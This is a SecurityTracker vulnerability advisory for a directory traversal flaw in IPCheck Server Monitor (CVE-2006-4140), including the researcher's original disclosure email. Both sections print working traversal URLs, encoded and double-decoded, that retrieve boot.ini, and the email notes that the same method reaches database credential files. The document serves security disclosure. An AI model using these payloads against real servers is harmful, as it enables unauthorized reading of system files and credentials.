IPCheck Server Monitor Lets Remote Users Traverse the Directory
|
|
SecurityTracker Alert ID: 1016676
|
|
SecurityTracker URL: http://securitytracker.com/id?1016676
|
|
CVE Reference: CVE-2006-4140
(Links to External Site)
|
Updated: Jun 8 2008
|
Original Entry Date: Aug 10 2006
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 5.3.2.609 and prior versions
|
Description: A vulnerability was reported in IPCheck Server Monitor. A remote user can view files on the target system.
The software does not properly validate user-supplied input. A remote user can supply a specially crafted request to view arbitrary
files on the target system.
Some demonstration exploit URLs are provided:
http://[target]:8080/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.
ini
http://[target]/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://[target]/images../..../..../..../..../..../..../..../..../..../.
.../..../boot.ini
http://[target]/images/..%255c../..%255c../..%255c../..%255c../boot.ini
The vendor has been notified.
Tassi
Raeburn reported this vulnerability.
|
Impact: A remote user can view files on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.paessler.com/ipcheck (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Windows (NT), Windows (2000), Windows (2003), Windows (XP)
|
Reported By: auuw73@dsl.pipex.com
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 10 Aug 2006 09:20:40 +0000
From: auuw73@dsl.pipex.com
Subject: Directory Traversal vulnerability in IPCheck Monitor Server
|
Directory Traversal vulnerability in IPCheck Monitor Server
--------------------------------------
Overview
A directory traversal vulnerability has been identified in IPCheck Server Monitor Free/Trial/Professi
onal, which may be exploited
by potential attackers to retrieve files from the underlying OS.
--------------------------------------
Description
An input validation error in the user supplied URL makes it possible to retrieve files from the syste
m root drive via directory traversal
attacks using typical hex Unicode and double decode directory traversal strings.
Examples:
http://[host]:8080/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://[IPAddress]/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://[IP address]/images../..../..../..../..../..../..../..../..../..../..../..../boot.ini
http://[IP address]/images/..%255c../..%255c../..%255c../..%255c../boot.ini
--------------------------------------
Affected Versions
IPCheck Server Monitor 4.3.1.368
IPCheck Server Monitor 4.3.1.382
IPCheck Server Monitor 5.1.0.342
IPCheck Server Monitor 5.2.0.404
IPCheck Server Monitor 5.3.0.508
IPCheck Server Monitor 5.3.2.609 (Current)
(Tested on Microsoft Windows server 2003 platform, other platforms maybe affected also).
--------------------------------------
Impact
This particular URL presents the systems boot.ini file located on the root of the system drive. A sim
ilar series of strings could
also be used by an attacker to access the configuration files of the firebird database which contain
the username and password used
to access the database.
--------------------------------------
Solution
The vendor of this product has been contacted to inform them of this vulnerability but no patch or up
date has been released since
the first vulnerable version tested (4.3.1.368).
Tassi Raeburn
Independent Vulnerability Tester
|
|
